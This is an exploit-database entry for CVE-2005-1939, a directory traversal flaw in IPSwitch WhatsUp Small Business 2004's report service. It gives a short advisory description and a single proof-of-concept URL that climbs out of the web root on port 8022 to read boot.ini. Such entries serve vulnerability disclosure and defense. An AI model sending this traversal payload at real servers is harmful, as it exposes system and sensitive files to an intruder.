IPSwitch WhatsUp Small Business 2004 Report Service - Directory Traversal



EKU-ID: 31779 CVE: CVE-2005-1939;OSVDB-20456 OSVDB-ID:
Author: Dennis Rand Published: 2005-11-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/15291/info

IPSwitch WhatsUp Small Business 2004 is prone to a directory traversal vulnerability. Successful exploitation could allow a remote attacker to gain access to files outside the Web root. Sensitive information may be obtained in this manner.

http://[address of server]:8022/../../../../../../../../../../../boot.ini